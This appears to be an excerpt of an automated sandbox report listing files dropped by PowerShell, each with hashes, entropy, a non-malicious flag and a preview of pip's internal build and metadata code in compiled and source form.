                                                                                                                                                                                                                      SHA-256:D4B5A639549E70083540ABD077AAAA67D50D91307E4F10661EA0DA3CF1E36EE2
                                                                                                                                                                                                                      SHA-512:4ECABC9FE43EB686D9CBDD15D106230A3738F75890C328949D8B292137315F678E511EAD8DCFCAB3FFC79DD73C4FBFA45491E75D9BEEFD3C8A4F0A5E0F7C825F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e.m.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6m7Z7..d.d.l8m9Z9..d.d.l:m;Z;m<Z<m=Z=m>Z>..d.d.l?m@Z@..d.d.lAmBZB..d.d.lCmDZD....e1eE........ZFd.e/d.e-d.e.d.eGd.eGd e.f.d!..ZHd"e!d#eId$eJd d.f.d%..ZK..G.d&..d'........ZL....d2d"e!d(e&d)e.eI....d*e.e6....d eLf.d+..ZM..d2d"e!d)e.eI....d*e.e6....d eLf.d,..ZN....d2d"e!d#eId(e&d$eJd)e.eI....d*e.e6....d e.eL....f.d-..ZO..d3d"e!d)eId*e.e6....d.eGd e.eI....f.d/..ZP..G.d0..d1........ZQy.)4z)Prepares a distribution for installation......N)...Path)...Dict..Iterable..List..Optional)...canonicalize_name)..)make_distribution_for_install_requirement)...InstalledDistribution)...DirectoryUrlHashUnsupported..HashMismatch..HashUnpinned..InstallationError..Meta
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):220
                                                                                                                                                                                                                      Entropy (8bit):4.8143839236019055
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:L2/VneP8u95/n23d6oAreKAqAIiW4R6Iaatgem/l:i/VeP8g/2ImbsiDjaatHmt
                                                                                                                                                                                                                      MD5:72765E8A73DCAA67DA4F86E13C18F77E
                                                                                                                                                                                                                      SHA1:A7265162B247A6EE98E3D5EE9E6D4A4897B4E2EF
                                                                                                                                                                                                                      SHA-256:E70E41C97EB38E2F69689E22E3B330076E81656C8EF84D1D8A11479F101E79F6
                                                                                                                                                                                                                      SHA-512:5629D4BF757D564D713E801FDAEC300B3F3BFC799DFA135650D6A62D9262FDD3F3F7FF4020E2FDCF05AB035A697F4BF5DCB46349560DD956754FD277125FAD07
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e................................y.).N..r..........{C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/build/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7831
                                                                                                                                                                                                                      Entropy (8bit):5.343355514142353
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:KAXtXwqhfCKD9C25qXtjYMxasmMk68VjN73N62FUkYQjVmhe/Y:KOXhhf/D96OM8VjtFUImhl
                                                                                                                                                                                                                      MD5:F21B877C921E4395F443E8CD61E22525
                                                                                                                                                                                                                      SHA1:D3BBA5A20407A9CA1FE091BFB7CB085E908B0EF9
                                                                                                                                                                                                                      SHA-256:360DE17788ADDF63025C0D26612B67C6FD0E5B61E83519B2B895F64D427E7A4A
                                                                                                                                                                                                                      SHA-512:E00F99E1CE610E5C9A55EC16AD9D9F338F95E013E400ECF1E2DE4137FCE369C90142EF10C8134F69814C9F3C8D71888E87864BA73FCCE9541BB281C3D86D2D69
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e..........................&.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j&..................e.........Z.e.j,..................d.e.d.e.d.....f.d...........Z.e.j,..................d.e.d.....f.d...........Z...G.d...d.e.........Z...G.d...d.........Z.y.)......N)...TracebackType)...Dict..Generator..Optional..Set..Type..Union)...Link)...InstallRequirement)...TempDirectory..changes..return..NNNc................+.......K.....t.........j...................}.t.................}.i.}.|.j...........................D.]...\...}.}...|.|.....|.|.<...|.|.|.<.........d.......|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..y.#.t.........$.r...|.|.|.<...Y..Tw.x.Y.w.#.|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..w.x.Y.w...w...N)...os..environ..object..items..KeyError..isinstance..str).r......targ
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1897
                                                                                                                                                                                                                      Entropy (8bit):5.653573824960168
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:KCXBXWk0LhIaZjpml+L2C58Q/D2fxa1tK:/XP0VIaZja+/5n2z
                                                                                                                                                                                                                      MD5:A7042E1817E21968BB50DC2C0A3B6C86
                                                                                                                                                                                                                      SHA1:D6DCE99DDA015550918DDA3FEE6235EF5A8643BF
                                                                                                                                                                                                                      SHA-256:3CEC6626620BC9CD6EF8E4E8E60EE1946A1D30B4AEC78A0140BF39F20F9ADD0D
                                                                                                                                                                                                                      SHA-512:40D5E43BFA4C25C92240245A6D17CC41F0EA8E78BDC37C1C14CCC7C5256D831F19C055BE66A27625F52EEB5162847187E2F3123DB504EA43398DAD9FECB04A06
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz#Preparing metadata (pyproject.toml))...package_detailsN).r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1931
                                                                                                                                                                                                                      Entropy (8bit):5.657585458925144
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:OCXBXWk0LhIaZjpmW+H62I5D/c2Qua1tw:TXP0VIaZjx+Ho5DIQ
                                                                                                                                                                                                                      MD5:83D75D024310363D7BBA899C9C0E48C5
                                                                                                                                                                                                                      SHA1:DB44236929AD06D2C312332D121E00923F8E88E0
                                                                                                                                                                                                                      SHA-256:88DEE3E4AB460CF9F878392D8FFACE534D313048A5F7DE151DFA57662606F250
                                                                                                                                                                                                                      SHA-512:ADB2F0EDF845580D189EDFB1166CEFE81273F1E45C725ABEDF94FCE2C68F01AE0EE491089389E89F254A174DA6C7EAC0C31F244770E859F9C4F82EC7027C850D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz,Preparing editable metadata (pyproject.toml))...package_detail
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3082
                                                                                                                                                                                                                      Entropy (8bit):5.679598430733228
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:ghRGnLcy+K9YkJPL2P042c5j5q1oFY+TpElN2CUyGv5JcgesigO3bHtq7:QwLcy+mJPL2NFY+TpgUPHcIsHu
                                                                                                                                                                                                                      MD5:5A244B8CCDC1BA837CC2A12B38B8DF80
                                                                                                                                                                                                                      SHA1:D61F6842A5A8119BBE30B5BE17C80BB4DCF4B285
                                                                                                                                                                                                                      SHA-256:679F947E9011D8F5C26E53ACF2D26BB4875097F55EF01BEACCAD7B876F53EB62
                                                                                                                                                                                                                      SHA-512:0D8BA731A4C875499B3113A6AA5557588D8DB32FB004C2E0C8706F36478AAA8B17A179213A2D21FACA4EBED39865E148334F2A5A4EE6C4349BB1DD1CA738C321
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j"..................e.........Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.d.e.d.e.d.e.f.d...Z.y.).z;Metadata generation logic for legacy source distributions.......N)...BuildEnvironment)...open_spinner)...InstallationError..InstallationSubprocessError..MetadataGenerationFailed)...make_setuptools_egg_info_args)...call_subprocess)...TempDirectory..directory..returnc.....................*.....t.........j...................|.........D...c.g.c.]...}.|.j...................d.........s...|.......}.}.|.s.t.........d.|...............t.........|.........d.kD..r.t.........d.j...................|...................t.........j...................j...................|.|.d.............S.c...c.}.w.).z.Find an .egg-info subdirectory in `directory`.z..egg-infoz No .egg-info directory found in .....z-More than one .egg-info directory found in {}r....)...os..listdir..endswith
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1698
                                                                                                                                                                                                                      Entropy (8bit):5.607949285878918
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4WsvKb7k+s4vDHvS2gkuS6aStsPP4x23Hgwr2Wyv2txl6zyDM5wt9S:WvKbwEK2F+bx2/6230zdY9S
                                                                                                                                                                                                                      MD5:70E837E91D35151364A9661844601FF9
                                                                                                                                                                                                                      SHA1:BC2BB7C22D04CF69B3BA1B2B5554B8A317CBC1A4
                                                                                                                                                                                                                      SHA-256:0E834633F03BD6A6B6810B7A5218BBBABB1ADBA373B34BD305ACBEFBD2FCF221
                                                                                                                                                                                                                      SHA-512:7BA06D716466BE23EF323F79CEDC94AB04075DE4EB78182CD85C7308D62C9B6B29414F2F69C0729C83CB04706902585CABB5D4A8E3FCA9024AE09D4F7C27E989
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e3.........................~.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc.....................R.....|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5...|.j...................|.|...........}.d.d.d...........t.........j...................j...................|...........S.#.1.s.w...Y......)x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Destination directory: %sz.Building wheel for z. (pyproject.toml)).r....z.Failed building wheel for %s)...logger..debugr......subprocess_runner..build_wheel..Exception..error..os..path..join).r
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2039
                                                                                                                                                                                                                      Entropy (8bit):5.6779197230443925
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:YZZoPzvKzxOtG2F0PSqw2JnkUIg9qFZ0zOVw:c+b68c2CPS7PgaA
                                                                                                                                                                                                                      MD5:B042C89E6288F79ABE2526E1488ECFD5
                                                                                                                                                                                                                      SHA1:6742D63D210503C618F982FCE2B0A09879C8CC82
                                                                                                                                                                                                                      SHA-256:79840C60C8FAA1859D6FA132280A7CDF78CBADD5580F0B37071913D62E4D2F11
                                                                                                                                                                                                                      SHA-512:F300D0566C6AC07527E5D676AFAAC10EA48428A9AF8D38BB51DBF94ED2E0B3527663EAF3400B7F61F514C1847160B876209F84FEC0949D0C40755EC2452E00F6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e...............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller..HookMissing)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc...........................|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5.....|.j...................|.|...........}...d.d.d...........t.........j...................j...................|...........S.#.t.........$.r)}.t.........j...................d.|.|...........Y.d.}.~.d.d.d...........y.d.}.~.w.w.x.Y.w.#.1.s.w...Y......^x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Destination directory: %sz.Building editable for z. (pyproject.tom
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3946
                                                                                                                                                                                                                      Entropy (8bit):5.628684148986529
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:feM+G3ATAZOGAb2Hy+pNjws8bQZNcfwYRQammfU+S22N57a+tPZ6ksMpIIyN7Rc3:fV3zKXUjwnaKfZR6+S2szPZrsN7cCNe
                                                                                                                                                                                                                      MD5:C83D8C0D2FD2C8C26C5E59C53A9F7C0F
                                                                                                                                                                                                                      SHA1:BB83996B7CA1BA4762B122C90FA4B5C6C11225A4
                                                                                                                                                                                                                      SHA-256:EF066C810509F0D14450CBEE63ABFAC5E8E06CDF00CC9CEC40B3734B3F90D739
                                                                                                                                                                                                                      SHA-512:FAC7C33CF734BE2220DCE817D566CC4DC6DC366282AAB1FD3996AE789EC4B6B9D8742B5788437DC03517D81EE581C594241891D43FDFDA22B1D7A92E87835FD2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j...................e.........Z.d.e.e.....d.e.d.e.f.d...Z.d.e.e.....d.e.d.e.d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional)...open_spinner).. make_setuptools_bdist_wheel_args)...call_subprocess..format_command_args..command_args..command_output..returnc...........................t.........|.........}.d.|...d...}.|.s.|.d.z...}.|.S.t.........j...........................t.........j...................kD..r.|.d.z...}.|.S.|.j...................d.........s.|.d.z...}.|.d.|.....z...}.|.S.).z'Format command information for logging.z.Command arguments: ...z.Command output: Nonez'Command output: [use --verbose to show]z.Command output:.).r......logger..getEffectiveLevel..logging..DEBUG..endswith).r....r......command_desc..texts.... ..C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4832
                                                                                                                                                                                                                      Entropy (8bit):4.618328684403838
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:IOYy0tIvdlzsjYMxasmoX2oL5QTUVan0FHPYQxai:IDywSldyiz0FHBai
                                                                                                                                                                                                                      MD5:F96311DD96F1BE4BB365524BE991BE50
                                                                                                                                                                                                                      SHA1:AD8A4AB522BB9F567A393CF6D0DE5ED1314CBAB7
                                                                                                                                                                                                                      SHA-256:CFE1F90CE92765D05ADDD87656AE9504C639A8B6082A6963DA9E821992B92DCF
                                                                                                                                                                                                                      SHA-512:D9E4F2BA33DE58F3F040D3DA293016EDB25BE0D02642F52947D0483B84E3851E644113672EA58C70123FADE9CDCE99B47239849CE0D14DE714EC1D37976FF854
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import contextlib.import hashlib.import logging.import os.from types import TracebackType.from typing import Dict, Generator, Optional, Set, Type, Union..from pip._internal.models.link import Link.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...@contextlib.contextmanager.def update_env_context_manager(**changes: str) -> Generator[None, None, None]:. target = os.environ.. # Save values from the target and change them.. non_existent_marker = object(). saved_values: Dict[str, Union[object, str]] = {}. for name, new_value in changes.items():. try:. saved_values[name] = target[name]. except KeyError:. saved_values[name] = non_existent_marker. target[name] = new_value.. try:. yield. finally:. # Restore original values in the target.. for name, original_value in saved_values.items():. if orig
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1422
                                                                                                                                                                                                                      Entropy (8bit):4.6243304875946425
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:Ab0HQNdptouYXrkezPAZDI8QE2jbZjpmlLCGIJtHvH5lp0y2C5FX/P66fmepkety:AnNJSkO8QLjbZjpml+VvWy2C5ocnkyE/
                                                                                                                                                                                                                      MD5:39771CD0BE98EC2FA8E622FDA059FDF0
                                                                                                                                                                                                                      SHA1:C816FD8F874F799A9620D92DB505598D21C82BA8
                                                                                                                                                                                                                      SHA-256:F52D02503F14DD0A99797A7E672B7C1F1C14F74944E10AE760382BA990F30677
                                                                                                                                                                                                                      SHA-512:578A0446D208F615FADDA5C21CAEEAF4DF744572111C6043ADE541BFC142AC6354F4DE0E24DEC4D31535F433A1A663CF661C121351DCDBCA2510D0AEAD8F8A1E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel, so we don't have to. # consider the possibility that this hook doesn't exist..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1474
                                                                                                                                                                                                                      Entropy (8bit):4.593686499595817
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:Ab0HQNdptouYXrkezPAEBDI8QE2jbZjpmWLCGIJtHvH5lp9E2PA57/P66fmedQkX:AnNJSkx8QLjbZjpmW+VvLE2I5ucTQkyo
                                                                                                                                                                                                                      MD5:E46DA46FB32FE4B45B9961E977915B95
                                                                                                                                                                                                                      SHA1:DF9F933316C1DBFE666BFB169C6DE0D2884C74E6
                                                                                                                                                                                                                      SHA-256:54B2FB2EF9ED284F2AC5D854744261728B45CD4B0E488F0D352D38DF150B29EC
                                                                                                                                                                                                                      SHA-512:A25E7D52711F6FC40EB819C217CE90AF874ABA5CAE67B31272941DC7D151EAA8C57FCEF62EDB1835BE2AD6EEF6DBA0283CCA732361E7F20D7C6E4A0812D4A9E7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_editable_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel/editable, so we don't have to. # consider the possibility that this hook doe
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2198
                                                                                                                                                                                                                      Entropy (8bit):4.514631026862264
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:AyFTclkcBb5euAi9e6qa3h48Q4UOFY+2EVi/e2CFkyz1RJ5i:AyFTxcr13C8VFY+2lGCuRO
                                                                                                                                                                                                                      MD5:8D1B8A2EC71166ECC0014C332636D8E2
                                                                                                                                                                                                                      SHA1:01B6632B02F1FCA9880DACF96142556D33F159BB
                                                                                                                                                                                                                      SHA-256:A3E794DB502CD7BE610C2EDD96E3357C927F16AA244C84A1C96A6329A2291D9C
                                                                                                                                                                                                                      SHA-512:C6314BE4C5E87A9C7A4253DFCB26163666DF242834DFB3AE0B86CA2D2127AB39B1993FAAC474B4AC0E5A49A2B13A65C1166C2B0B72C0B0B6D3F567A375460A3D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Metadata generation logic for legacy source distributions.."""..import logging.import os..from pip._internal.build_env import BuildEnvironment.from pip._internal.cli.spinners import open_spinner.from pip._internal.exceptions import (. InstallationError,. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.setuptools_build import make_setuptools_egg_info_args.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...def _find_egg_info(directory: str) -> str:. """Find an .egg-info subdirectory in `directory`.""". filenames = [f for f in os.listdir(directory) if f.endswith(".egg-info")].. if not filenames:. raise InstallationError(f"No .egg-info directory found in {directory}").. if len(filenames) > 1:. raise InstallationError(. "More than one .egg-info directory found in {}".format(directory). ).. return
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1075
                                                                                                                                                                                                                      Entropy (8bit):4.592001270993553
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tmdptPRVjWqaS2drOX8Sq7/P6R2TBNSSREhL:CdjP2dKXIuET3pEhL
                                                                                                                                                                                                                      MD5:BFD26E6B7D053BEAE312119DF6233540
                                                                                                                                                                                                                      SHA1:DCD764C358F280CC9FDB2E90AB06A9686D3F21BA
                                                                                                                                                                                                                      SHA-256:B13D761412C0C430BAC32AC3A2B87C92F719D631B9A889C2456CF33FE5242624
                                                                                                                                                                                                                      SHA-512:04462A2559C1FDD8815BEE2762899581B620D3035BE6CDF97BD081B9901B4DE633352C8D8D8444A13D6A549C6608C3420FD9717EDC0705BB5AFAC9F98897C6B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_pep517(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Destination directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building wheel for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. wheel_name = backend.build_wheel(. tempd,. metadata_directory=metadata_directory,. ). except Exception:. logger.error("Failed building wheel for
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1417
                                                                                                                                                                                                                      Entropy (8bit):4.3101463528891335
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tmdp9vaPCXvF6jWqat2drOXzP7/P66R2lvFIBNDcPzsdFjyEhL:C9vHXvgjI2dKXruXlva3DssdF2EhL
                                                                                                                                                                                                                      MD5:D481FB9C7608F878A84FB81A8A7AA2D1
                                                                                                                                                                                                                      SHA1:1D8E256134A57F9C5FA78BB388B31B61D2D0C3CE
                                                                                                                                                                                                                      SHA-256:C8EB681FACE9024A0A60452DAFC161CEB62790D1D0690063590D8761A7B53108
                                                                                                                                                                                                                      SHA-512:6DFC8DD2DDBDA76D94096930883688E83D50904173BFD1F6AB4F7EC3A4BA026B879059AD5443884F558C537234D38E22D43917DF406BB072B9C2898F0D12D859
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller, HookMissing..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_editable(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Destination directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building editable for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. try:. wheel_name = backend.build_editable(. tempd,. metadata_directory=metadata_directory,. ). exc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3064
                                                                                                                                                                                                                      Entropy (8bit):4.513661919781371
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:PB2BMxxA1CiycvkJAWlQprspdzSCgGZnhqaLd8VsgS2QVMaGrXbF4+g9:PB2BT6JAWyprudz+GZnwOd8igS2QSFVS
                                                                                                                                                                                                                      MD5:3A5B36046CFE14561424A5E1EFB50CBB
                                                                                                                                                                                                                      SHA1:30C3511EBD59DC05391D5239455C12D74E697BC0
                                                                                                                                                                                                                      SHA-256:0BD8FAAEE920408D67FC97902E8646B8375F530CC25D287221D3D3A7A79D6CC4
                                                                                                                                                                                                                      SHA-512:BF8AC3322DFFD7B07975E05FF212345F240325204B7A87D55CBB0AEACA7BEA38DB68BB9EFC3330C807B73677FA5B9C0AE17795E2C448CF590439F252DC0E84AA
                                                                                                                                                                                                                      Malicious:false
